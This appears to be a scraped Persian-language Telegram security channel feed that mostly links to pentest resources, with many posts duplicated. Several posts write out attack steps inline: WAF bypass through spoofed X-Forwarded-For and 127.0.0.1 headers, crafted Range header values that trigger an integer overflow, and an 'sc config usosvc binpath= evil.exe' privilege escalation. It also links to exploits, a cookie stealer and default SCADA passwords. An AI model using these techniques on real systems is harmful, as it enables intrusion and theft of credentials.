XSS To Good XSS With ClickJacking on Subdomain Microsoft
https://link.medium.com/4EXo7G8Sk1
#XSS
#web
#BugBounty
@sec_nerd
https://link.medium.com/4EXo7G8Sk1
#XSS
#web
#BugBounty
@sec_nerd
Medium
XSS To Good XSS With ClickJacking on Subdomain Microsoft
Bismillah hirrahman nirrahim.
گوگل سعی دارد خود را به نقطه دستیابی به تمام محتوای وب تبدیل کند. این عمل با سه گامی که شرکت گوگل برداشته است انجام شده:
۱- حذف آدرس های قابل دیدن در کروم با استفاده از origin chip
۲- جریمه وبسایتهایی که از قابلیت google AMP استفاده نمیکنند (گوگل AMP سرویس گوگل برای ساخت و نمایش صفحات وب با سرعت بالا و هماهنگ با دستگاه های مختلف است)
۳- حذف آدرس های وبسایتها از نتایج جستجوی گوگل
https://twitter.com/drybones_5/status/1190694123965210625
#news
#google
@sec_nerd
۱- حذف آدرس های قابل دیدن در کروم با استفاده از origin chip
۲- جریمه وبسایتهایی که از قابلیت google AMP استفاده نمیکنند (گوگل AMP سرویس گوگل برای ساخت و نمایش صفحات وب با سرعت بالا و هماهنگ با دستگاه های مختلف است)
۳- حذف آدرس های وبسایتها از نتایج جستجوی گوگل
https://twitter.com/drybones_5/status/1190694123965210625
#news
@sec_nerd
Hubspot
Google AMP Helps You Make Stunning Web Experiences. Here's How.
Google AMP is open-source software that helps you make incredible web experiences for customers. Learn how in this post.
بایپس کردن WAF با استفاده از هدر های http
محقق امنیت Jason Haddix بعد از تحقیقات زیاد و سرکله زدن با فایروال ها فهمیده که فایروال های وب معمولا از 4 حالت برای محافظت از وبسایت حملات رو تشخیص میدن
1 : فایروال ابتدا هدر X-originating-IP شخص فرستنده ی درخواست رو بررسی میکنه. درصورتی که ایپی درخواست 127.0.0.1 باشه فایروال فکر میکنه که درخواست از طرف خودش هست و کاری به کار هکر نداره
2 : بعد از تحقیقات بیشتر فهمید که بعضی هدر ها وجود دارند که WhiteList های اکثر فایروال ها محسوب میشوند که اسامی این هدر ها به صورت زیر است :
X-forwarded-for
X-remote-IP
X-originating-IP
x-remote-addr
3 : در روش سوم نیز ما یک پروکسی interception برای مرورگرمون تنظیم میکنیم ( Burp Suite ) و لیست هدر هایی که توسط فایروال بلک لیست نشده و به عنوان هدر مورد قبول در یک درخواست ارسال میشن رو میشه تست کرد و برداشت و اینگونه فایروال رو بایپس کرد . یک ابزار خاصی هم برای پیدا کردن انواع هدر های http یک سایت به نام GetHead وجود دارد که این کار را آسان میکند .
همچنین یک extenstion یا پلاگین در این راستا برای ابزار Burp Suite نیز طراحی شده که میتوانید از اینجا تهیه نمایید .
مترجم : ارسلان قربانزاده
#WAF
#bypass
#burpsuite
@sec_nerd
محقق امنیت Jason Haddix بعد از تحقیقات زیاد و سرکله زدن با فایروال ها فهمیده که فایروال های وب معمولا از 4 حالت برای محافظت از وبسایت حملات رو تشخیص میدن
1 ) درخواست و پاسخ سریع با استفاده از متود post به فرم ها
2 ) درخواست و پاسخ سریع با استفاده از متود get به بسیاری از صفحات سایت
3 ) فقدان یا عدم مطابقت توکن CSRF
4 ) کاراکتر های بد که برای نفود از آنها استفاده میشود
این محقق با مطالعات بیشتر متوجه شده است که همچنین فایروال ها در اغاز یک درخواست ، اولین کار هایی که میکنند به سه مرحله تقسیم میشود : 1 : فایروال ابتدا هدر X-originating-IP شخص فرستنده ی درخواست رو بررسی میکنه. درصورتی که ایپی درخواست 127.0.0.1 باشه فایروال فکر میکنه که درخواست از طرف خودش هست و کاری به کار هکر نداره
2 : بعد از تحقیقات بیشتر فهمید که بعضی هدر ها وجود دارند که WhiteList های اکثر فایروال ها محسوب میشوند که اسامی این هدر ها به صورت زیر است :
X-forwarded-for
X-remote-IP
X-originating-IP
x-remote-addr
3 : در روش سوم نیز ما یک پروکسی interception برای مرورگرمون تنظیم میکنیم ( Burp Suite ) و لیست هدر هایی که توسط فایروال بلک لیست نشده و به عنوان هدر مورد قبول در یک درخواست ارسال میشن رو میشه تست کرد و برداشت و اینگونه فایروال رو بایپس کرد . یک ابزار خاصی هم برای پیدا کردن انواع هدر های http یک سایت به نام GetHead وجود دارد که این کار را آسان میکند .
همچنین یک extenstion یا پلاگین در این راستا برای ابزار Burp Suite نیز طراحی شده که میتوانید از اینجا تهیه نمایید .
مترجم : ارسلان قربانزاده
#WAF
#bypass
#burpsuite
@sec_nerd
GitHub
GitHub - codewatchorg/bypasswaf: Add headers to all Burp requests to bypass some WAF products
Add headers to all Burp requests to bypass some WAF products - codewatchorg/bypasswaf
آزمون آسیب پذیری SQL injection از نوع Time based با استفاده از امکان repeater در burpsuite
#burpsuite
#sqli
#pentest
@sec_nerd
#burpsuite
#sqli
#pentest
@sec_nerd
امنیت اطلاعات
Apache Solr RCE via Velocity Template Injection https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt #apache #rce #exploit @sec_nerd
آسیب پذیری RCE بر روی نسخه آخر Apache Solr یعنی نسخه 8.3.0 نیز کار میکند.
https://www.exploit-db.com/exploits/47572
#apache
#rce
#exploit
@sec_nerd
https://www.exploit-db.com/exploits/47572
#apache
#rce
#exploit
@sec_nerd
حرکت جدید مایکروسافت و ارائه ی Application Guard باعث شد که حتی با فعال شدن ماکروها هم نشه کاری از پیش برد و کسانی که با spear phishing اهداف خودشون رو آلوده میکردن کارشون سخت تر از قبل بشه!
#spear_phishing
#microsoft
#windows
@sec_nerd
#spear_phishing
#microsoft
#windows
@sec_nerd
بالا بردن سطح دسترسی در شبکه های ویندوزی
قسمت اول:
https://blog.compass-security.com/2019/07/privilege-escalation-in-windows-domains-1-3/
قسمت دوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-2-3/
قسمت سوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/
#privesc
#windows
#network
#AD
@sec_nerd
قسمت اول:
https://blog.compass-security.com/2019/07/privilege-escalation-in-windows-domains-1-3/
قسمت دوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-2-3/
قسمت سوم:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/
#privesc
#windows
#network
#AD
@sec_nerd
ابزار استخراج کوکی ها و پسوردها از مروگر کروم
نوشته شده با #C
https://github.com/rasta-mouse/CookieMonster
#chrome
#enum
@sec_nerd
نوشته شده با #C
https://github.com/rasta-mouse/CookieMonster
#chrome
#enum
@sec_nerd
GitHub
rasta-mouse/CookieMonster
Contribute to rasta-mouse/CookieMonster development by creating an account on GitHub.
👍1
مجموعه پسوردهای پیشفرض دستگاه های کنترل صنعتی
https://www.critifence.com/default-password-database/
#SCADA
#pentest
#network
@sec_nerd
https://www.critifence.com/default-password-database/
#SCADA
#pentest
#network
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
Manually Detect Remote Integer Overflow:
1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)
#web
#pentest
@sec_nerd
1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)
#web
#pentest
@sec_nerd
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
تست نشده!
#windows
#privesc
#pentest
@sec_nerd
Twitter
ap
CVE-2019-1322 as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
کشف باگ در میکروتیک
https://github.com/tenable/routeros/blob/master/slides/bug_hunting_in_routeros_derbycon_2018.pdf
تعدادی از اکسپلویت های مربوط به میکروتیک؛
https://github.com/tenable/routeros/tree/master/poc
یک رایت آپ در خصوص نفوذ به میکروتیک و ایجاد سطح دسترسی روت:
https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
#mikrotik
#routeros
#network
#pentest
@sec_nerd
https://github.com/tenable/routeros/blob/master/slides/bug_hunting_in_routeros_derbycon_2018.pdf
تعدادی از اکسپلویت های مربوط به میکروتیک؛
https://github.com/tenable/routeros/tree/master/poc
یک رایت آپ در خصوص نفوذ به میکروتیک و ایجاد سطح دسترسی روت:
https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
#mikrotik
#routeros
#network
#pentest
@sec_nerd
GitHub
routeros/slides/bug_hunting_in_routeros_derbycon_2018.pdf at master · tenable/routeros
RouterOS Security Research Tooling and Proof of Concepts - tenable/routeros